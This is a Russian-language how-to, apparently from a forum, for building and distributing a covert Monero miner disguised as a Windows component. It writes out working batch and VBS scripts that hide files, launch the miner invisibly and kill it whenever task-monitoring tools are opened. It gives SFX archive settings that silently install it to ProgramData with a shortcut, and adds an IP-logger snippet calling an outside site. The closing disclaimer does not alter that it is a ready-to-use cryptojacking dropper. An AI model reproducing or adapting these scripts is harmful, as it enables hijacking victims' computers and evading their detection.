Делаем скрытый майнер

Скрытый майнер из подручной хуйни и батиных трав

Первое что нам нужно - исходники. Качаем архив и находим следующие файлы:

libcrypto-1.0.0.dll

libcurl-4.dll

libgcc_s_seh-1.dll

libjansson-4.dll

libssl-1.0.0.dll

libstdc++-6.dll

libwinpthread-1.dll

libz-1.dll

cpuminer-SSE2.exe (переименуем на cpuminer.exe)

Скачать: https://github.com/nicehash/NiceHashMiner/releases/download/1.7.0.0-dev/bin_1_7_4_2.zip

Создаем новую папку и кидаем туда эти файлы

Далее создаем батник для скрытия файлов и запуска майнера (cpu.bat):

attrib +h +r +s /S /D *.*

set /a cpu=%NUMBER_OF_PROCESSORS%/2

cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u %Ваша почта% -p x -t %cpu%

set /a cpu=%NUMBER_OF_PROCESSORS%/2 - работа на половине cpu

set /a cpu=%NUMBER_OF_PROCESSORS%-1 - работа на всех cpu за исключением одного

Скрипт на vbs для скрытого запуска батника (cpu.vbs):

Set WshShell = CreateObject("WScript.Shell")

WshShell.Run chr(34) & C:\ProgramData\Windows\cpu.bat" & Chr(34), 0

Set WshShell = Nothing

Теперь - батник для сокрытия cpuminer.exe из Диспетчера (поддерживаются Win 8 и старше), ProcessHacker, ProcessExplorer(Explorer.bat):

@ echo off (после @ пробела не нужно)

SETLOCAL EnableExtensions

:start

set EXE=taskmgr.exe

set EXE1=Taskmgr.exe

set EXE2=procexp64.exe

set EXE3=ProcessHacker.exe

FOR /F %%x IN ('tasklist /NH /FI "IMAGENAME eq %EXE%"') DO IF %%x == %EXE% goto Found

FOR /F %%x IN ('tasklist /NH /FI "IMAGENAME eq %EXE1%"') DO IF %%x == %EXE1% goto Found

FOR /F %%x IN ('tasklist /NH /FI "IMAGENAME eq %EXE2%"') DO IF %%x == %EXE2% goto Found

FOR /F %%x IN ('tasklist /NH /FI "IMAGENAME eq %EXE3%"') DO IF %%x == %EXE3% goto Found

goto NotFound

:NotFound

timeout /t 1 /nobreak

cls

goto checkMINE

:Found

taskkill /F /IM cpuminer.exe

timeout /t 1 /nobreak

cls

goto start

:checkMINE

set prog=cpuminer.exe

FOR /F %%x IN ('tasklist /NH /FI "IMAGENAME eq %prog%"') DO IF %%x == %prog% goto MineON

goto MineOFF

:MineON

CLS

goto start

:MineOFF

start C:\ProgramData\Windows\cpu.vbs

goto start

Создадим vbs для скрытого запуска Explorer.bat (Explorer.vbs):

Set WshShell = CreateObject("WScript.Shell")

WshShell.Run chr(34) & "C:\ProgramData\Windows\Explorer.bat" & Chr(34), 0

Set WshShell = Nothing

И так, у нас есть:

cpu.bat - запуск майнера

cpu.vbs - скрытый запуск cpu.bat

Explorer.bat - сокрытие из диспетчера

Explorer.vbs - скрытый запуск Explorer.bat

libcrypto-1.0.0.dll

libcurl-4.dll

libgcc_s_seh-1.dll

libjansson-4.dll

libssl-1.0.0.dll

libstdc++-6.dll

libwinpthread-1.dll

libz-1.dll

cpuminer.exe

Выделяем файл и клацаем создать архив.

В параметрах архива ставим галку SFX архив, метод сжатия - максимальный.

Можно добавить иконку. Идем в параметры SFX => Текст и графика => Загрузить значёк SFX из файла. Выбираем иконку с расширением .ico.

Переходим во вкладку комментарий. Вставляем это:

Path=C:\ProgramData\Windows

Setup=Explorer.vbs

Silent=1

Overwrite=1

Update=U

Shortcut=T, "Explorer.vbs", , , Explorer.lnk,

И создаем архив. В принципе все.

Еще пара скриптов от меня (vbs)

Ошибка:

PushButton = MsgBox ("Ошибка приложения (0xc0000005). Нажми OK и иди нахуй", 16, "Ошибка")

Ip logger:

On Error Resume Next

Set x = CreateObject("WinHttp.WinHttpRequest.5.1")

call x.Open("GET", "https://iplogger.com", 0, login, password)

x.Send()

Set s = CreateObject("ADODB.Stream")

s.Mode = 3

s.Type = 1

s.Open()

Данная статья создана исключительно для ознакомления и не призывает к действиям!